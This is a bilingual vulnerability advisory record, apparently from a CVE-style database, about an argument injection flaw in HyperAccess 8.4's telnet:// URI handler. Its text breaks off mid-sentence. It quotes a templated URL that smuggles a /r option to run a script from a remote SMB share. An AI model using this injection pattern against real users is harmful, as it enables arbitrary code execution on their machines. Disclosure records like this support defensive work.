漏洞标题
N/A
漏洞描述信息
HyperAccess 8.4中的参数注入漏洞允许远程攻击者通过telnet:// URI 中的 /r 选项执行任意vbscript和命令,而此选项被配置为使用hawin32.exe。
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
漏洞类别
N/A
漏洞标题
N/A
漏洞描述信息
Argument injection vulnerability in HyperAccess 8.4 allows user-assisted remote attackers to execute arbitrary vbscript and commands via the /r option in a telnet:// URI, which is configured to use hawin32.exe.
CVSS信息
N/A
漏洞类别
N/A
漏洞标题
Hyper Access Telnet URL协议恶意脚本任意vbscript代码执行漏洞
漏洞描述信息
HyperACCESS是HyperTerminal的官方升级,可为用户提供终端通讯解决方案。 HyperAccess中存在参数注入漏洞,以要求URL协议处理telnet:// URL控制程序。HyperAccess会接受/r为命令行参数指定将要运行的脚本文件,可使用类似于以下的URL通过Internet Explorer将该命令传送给URL:telnet://IPADDRESS:PORT # /r \\SERVER\share\scriptfile.txt ,如果SERVER为包含有恶意脚本的SMB共享或
CVSS信息
N/A
漏洞类别
授权问题